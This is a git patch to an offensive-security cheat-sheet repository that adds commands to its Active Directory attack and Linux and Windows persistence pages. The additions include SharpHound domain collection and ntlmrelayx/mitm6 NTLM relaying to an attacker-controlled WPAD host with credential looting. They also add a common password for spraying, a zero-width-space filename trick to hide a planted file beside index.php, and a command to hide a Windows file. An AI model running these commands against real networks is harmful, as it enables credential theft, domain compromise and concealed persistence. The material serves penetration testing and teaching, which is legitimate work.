From be0397fa688137798146782e8a157139f313f2f1 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 19 Jan 2020 22:46:45 +0100 Subject: [PATCH] BloodHound ZIP + Zero Width space tip --- Methodology and Resources/Active Directory Attack.md | 9 ++++++--- Methodology and Resources/Linux - Persistence.md | 8 +++++++- Methodology and Resources/Windows - Persistence.md | 6 ++++++ 3 files changed, 19 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 0ec49c3..2ca3d36 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -77,6 +77,8 @@ SharpHound.exe (from resources/Ingestor) SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + SharpHound.exe -c all -d active.htb -SearchForest + SharpHound.exe --EncryptZip --ZipFilename export.zip or Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public or @@ -112,6 +114,7 @@ # -wh: Server hosting WPAD file (Attacker’s IP) # -t: Target (You cannot relay credentials to the same device that you’re spoofing) # -i: open an interactive shell + ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access ``` * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) @@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern Most of the time the best passwords to spray are : -- Password123, mimikatz +- P@ssw0rd01, Password123, mimikatz - Welcome1/Welcome01 - $Companyname1 : $Microsoft1 - SeasonYear : Winter2019*,Spring2020!,Summer2018? @@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt mitm6 -i eth0 -d $domain # spoofing WPAD and relaying NTLM credentials -http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt +ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt or -http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug +ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug ``` #### Drop the MIC diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index f84fc8e..7007e2c 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder. Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. -```bash +```powershell ## Do not remove. Generated from /etc/issue.conf by configure. ``` +Hide in plain sight using zero width spaces in filename. + +```powershell +touch $(echo -n 'index\u200D.php') index.php +``` + Clear the last line of the history. ```bash diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index ea1ccb7..69986f5 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -21,6 +21,12 @@ ## Userland +Set a file as hidden + +```powershell +attrib +h c:\autoexec.bat +``` + ### Registry Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.